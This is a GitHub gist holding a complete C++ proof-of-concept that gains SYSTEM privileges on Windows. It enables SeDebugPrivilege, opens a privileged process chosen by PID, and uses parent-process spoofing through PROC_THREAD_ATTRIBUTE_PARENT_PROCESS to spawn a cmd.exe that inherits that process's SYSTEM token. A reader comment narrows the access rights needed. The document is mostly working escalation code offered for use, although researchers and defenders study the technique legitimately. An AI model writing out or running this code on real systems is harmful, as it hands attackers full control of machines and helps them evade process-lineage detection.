Created
November 20, 2017 00:11
-
-
Save xpn/a057a26ec81e736518ee50848b9c2cd6 to your computer and use it in GitHub Desktop.
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) { | |
TOKEN_PRIVILEGES tp; | |
LUID luid; | |
TOKEN_PRIVILEGES tpPrevious; | |
DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES); | |
if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE; | |
tp.PrivilegeCount = 1; | |
tp.Privileges[0].Luid = luid; | |
tp.Privileges[0].Attributes = 0; | |
AdjustTokenPrivileges( | |
hToken, | |
FALSE, | |
&tp, | |
sizeof(TOKEN_PRIVILEGES), | |
&tpPrevious, | |
&cbPrevious | |
); | |
if (GetLastError() != ERROR_SUCCESS) return FALSE; | |
tpPrevious.PrivilegeCount = 1; | |
tpPrevious.Privileges[0].Luid = luid; | |
if (bEnablePrivilege) { | |
tpPrevious.Privileges[0].Attributes |= (SE_PRIVILEGE_ENABLED); | |
} | |
else { | |
tpPrevious.Privileges[0].Attributes ^= (SE_PRIVILEGE_ENABLED & tpPrevious.Privileges[0].Attributes); | |
} | |
AdjustTokenPrivileges( | |
hToken, | |
FALSE, | |
&tpPrevious, | |
cbPrevious, | |
NULL, | |
NULL | |
); | |
if (GetLastError() != ERROR_SUCCESS) return FALSE; | |
return TRUE; | |
} | |
DWORD EnableDebug(void) { | |
HANDLE hToken; | |
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken)) { | |
if (GetLastError() == ERROR_NO_TOKEN) { | |
if (!ImpersonateSelf(SecurityImpersonation)) | |
return 0; | |
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken)) { | |
printf("OpenThreadToken"); | |
return 0; | |
} | |
} | |
else { | |
return 0; | |
} | |
} | |
// enable SeDebugPrivilege | |
if (!SetPrivilege(hToken, SE_DEBUG_NAME, TRUE)) | |
{ | |
printf("Error SetPrivilege"); | |
// close token handle | |
CloseHandle(hToken); | |
// indicate failure | |
return 0; | |
} | |
return 1; | |
} | |
int main(int argc, char **argv) { | |
int pid; | |
HANDLE pHandle = NULL; | |
STARTUPINFOEXA si; | |
PROCESS_INFORMATION pi; | |
SIZE_T size; | |
BOOL ret; | |
printf("GetSystem via Parent Process\n"); | |
printf("Created by @_xpn_\n\n"); | |
if (argc != 2) { | |
printf("Usage: %s PID\n", argv[0]); | |
return 1; | |
} | |
// Get the PID that we will use as our parent process | |
pid = atoi(argv[1]); | |
// We need SeDebugPriv to open processes like lsass | |
EnableDebug(); | |
// Open the process which we will inherit the handle from | |
if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == 0) { | |
printf("Error opening PID %d\n", pid); | |
return 2; | |
} | |
// Create our PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute | |
ZeroMemory(&si, sizeof(STARTUPINFOEXA)); | |
InitializeProcThreadAttributeList(NULL, 1, 0, &size); | |
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc( | |
GetProcessHeap(), | |
0, | |
size | |
); | |
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size); | |
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &pHandle, sizeof(HANDLE), NULL, NULL); | |
si.StartupInfo.cb = sizeof(STARTUPINFOEXA); | |
// Finally, create the process | |
ret = CreateProcessA( | |
"C:\\Windows\\system32\\cmd.exe", | |
NULL, | |
NULL, | |
NULL, | |
true, | |
EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, | |
NULL, | |
NULL, | |
reinterpret_cast<LPSTARTUPINFOA>(&si), | |
&pi | |
); | |
if (ret == false) { | |
printf("Error creating new process (%d)\n", GetLastError()); | |
return 3; | |
} | |
printf("Enjoy your new SYSTEM process\n"); | |
return 0; | |
} | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
https://gist.github.com/xpn/a057a26ec81e736518ee50848b9c2cd6#file-getsystem_parent-cpp-L105
You don't need PROCESS_ALL_ACCESS. You only need PROCESS_CREATE_PROCESS.